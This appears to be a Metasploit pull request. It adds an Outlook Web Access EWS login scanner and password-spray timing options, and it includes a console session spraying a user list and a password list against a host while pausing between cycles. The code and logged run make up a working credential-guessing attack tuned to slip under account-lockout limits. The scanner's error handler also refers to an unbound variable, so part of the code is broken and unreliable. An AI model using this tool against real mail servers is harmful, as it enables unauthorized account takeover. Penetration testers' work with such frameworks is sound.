### PR TITLE
add loginscanner timing options

### DIFF
--- a/lib/metasploit/framework/login_scanner/owa_ews.rb
+++ b/lib/metasploit/framework/login_scanner/owa_ews.rb
@@ -1,0 +1,48 @@
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      class OutlookWebAccessEWS < HTTP
+        DEFAULT_PORT    = 443
+        PRIVATE_TYPES   = [ :password ]
+        CAN_GET_SESSION = false
+
+        def attempt_login(credential)
+          result_opts = {
+            credential: credential
+          }
+
+          cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies, http_username, http_password)
+          configure_http_client(cli)
+          cli.connect
+
+          res = nil
+          begin
+            req = cli.request_raw({
+              'uri'      => uri,
+              'method'   => 'GET',
+              'username' => credential.public,
+              'password' => credential.private
+            })
+
+            res = cli.send_recv(req)
+
+          rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
+            result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e)
+            return Result.new(result_opts)
+          end
+
+          if res && res.code != 401 && res.code != 404
+            result_opts.merge!(status: Metasploit::Model::Login::Status::SUCCESSFUL)
+          else
+            result_opts.merge!(status: Metasploit::Model::Login::Status::INCORRECT)
+          end
+
+          Result.new(result_opts)
+        end
+      end
+    end
+  end
+end

--- a/spec/lib/metasploit/framework/login_scanner/base_spec.rb
+++ b/spec/lib/metasploit/framework/login_scanner/base_spec.rb
@@ -29,7 +29,6 @@ RSpec.describe Metasploit::Framework::LoginScanner::Base do
   }
 
   let(:options) {
-
     {
       connection_timeout: 1,
       cred_details: cred_collection,
@@ -37,7 +36,9 @@ RSpec.describe Metasploit::Framework::LoginScanner::Base do
       port: 4444,
       stop_on_success: true,
       bruteforce_speed: 5,
-
+      password_spray: true,
+      cycle_delay: 1,
+      passwords_per_cycle: 2
     }
   }
 


### PR DESCRIPTION
New PR for original: #10779 

Adds timing options to login scanners:
```
scanner = Metasploit::Framework::LoginScanner::OutlookWebAccessEWS.new(
  configure_http_login_scanner(
    <...snip...>
    passwords_per_cycle: datastore['PASSWORDS_PER_CYCLE'] || 0,
    cycle_delay:         datastore['CYCLE_DELAY'] || 0,
    password_spray:      datastore['PASSWORD_SPRAY'],
  )
)
```

Also updates owa_ews_login to use the above:
```
msf5 auxiliary(scanner/http/owa_ews_login) > cat /tmp/u /tmp/p
[*] exec: cat /tmp/u /tmp/p

user1
user2
user3
user4
user5
pass1
pass2
pass3
pass4
msf5 auxiliary(scanner/http/owa_ews_login) > set user_file /tmp/u
user_file => /tmp/u
msf5 auxiliary(scanner/http/owa_ews_login) > set pass_file /tmp/p
pass_file => /tmp/p
msf5 auxiliary(scanner/http/owa_ews_login) > set password_spray true
password_spray => true
msf5 auxiliary(scanner/http/owa_ews_login) > set passwords_per_cycle 2
passwords_per_cycle => 2
msf5 auxiliary(scanner/http/owa_ews_login) > set cycle_delay 1
cycle_delay => 1
msf5 auxiliary(scanner/http/owa_ews_login) > run

[+] Found NTLM service at /ews/ for domain ADTEST.
[!] No active DB -- Credential data will not be saved!
[-] somehost.com:443 - Login failed: user1:pass1 (Incorrect)
[-] somehost.com:443 - Login failed: user2:pass1 (Incorrect)
[-] somehost.com:443 - Login failed: user3:pass1 (Incorrect)
[-] somehost.com:443 - Login failed: user4:pass1 (Incorrect)
[-] somehost.com:443 - Login failed: user5:pass1 (Incorrect)
[-] somehost.com:443 - Login failed: user1:pass2 (Incorrect)
[-] somehost.com:443 - Login failed: user2:pass2 (Incorrect)
[-] somehost.com:443 - Login failed: user3:pass2 (Incorrect)
[-] somehost.com:443 - Login failed: user4:pass2 (Incorrect)
[-] somehost.com:443 - Login failed: user5:pass2 (Incorrect)
[*] Sleeping 1 minutes between cycles
[-] somehost.com:443 - Login failed: user1:pass3 (Incorrect)
[-] somehost.com:443 - Login failed: user2:pass3 (Incorrect)
[-] somehost.com:443 - Login failed: user3:pass3 (Incorrect)
[-] somehost.com:443 - Login failed: user4:pass3 (Incorrect)
[-] somehost.com:443 - Login failed: user5:pass3 (Incorrect)
[-] somehost.com:443 - Login failed: user1:pass4 (Incorrect)
[-] somehost.com:443 - Login failed: user2:pass4 (Incorrect)
[-] somehost.com:443 - Login failed: user3:pass4 (Incorrect)
[-] somehost.com:443 - Login failed: user4:pass4 (Incorrect)
[-] somehost.com:443 - Login failed: user5:pass4 (Incorrect)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/owa_ews_login) >
```

Edit: I have no idea what I'm doing with rspec.